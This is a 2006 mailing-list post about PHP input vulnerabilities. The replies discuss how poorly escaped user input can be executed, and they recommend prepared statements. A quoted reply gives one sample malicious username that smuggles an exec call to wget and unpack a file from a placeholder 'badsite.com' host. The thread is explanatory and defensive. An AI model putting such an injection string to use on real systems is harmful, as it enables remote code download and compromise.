[CS-FSLUG] PHP vulnerabilities?
Frank Bax
fbax at sympatico.ca
Sat Jun 3 07:55:26 CDT 2006
At 09:42 AM 6/2/06, Tim Young wrote:
>There are quite a number of ways to do this sort of thing. Most of the
>time it is a poorly written PHP (or other language) script. The basic
>thing is when you give someone the ability to input something. For
>example, a username.
>
>Instead of having a username "Tim", they use something like:
> "Tim; \"exec('wget http://badsite.com/badfile.tgz; tar -xzf
>badfile.tgz')\""
>
>If whoever wrote the php program did not properly escape the variables
>on the way in, there is a decent chance that the variable will be used
>in some context where it will be executed.
What kind of PHP code would cause the above user input to be executed? A
"decent chance" implies the problem only surfaces with some coding practices.
At 04:52 PM 6/2/06, Chris Brault wrote:
>A name should only contain alpha characters while an address only
>integers and alpha characters.
And ' in name/street like O'Reilly.
And - for hyphenated name/street.
And ...
Continue with these exceptions and someday you could accidently add a
character to "trusted" code that might actually reintroduce the problem you
were trying to avoid?
Whereas I'm not sure how the example provided by Tim would actually get
executed; I do know that the risk is real with input for databases. You
can this problem by using prepare/execute code instead of the older query()
syntax. Example here:
http://www.ip97.com/pear/package.database.db.intro-execute.html
Notice the line that says:
? - (recommended) stands for a scalar value like strings or numbers. The
value will be automatically escaped and quoted according to the current
DBMS's requirements.
Frank
More information about the Christiansource
mailing list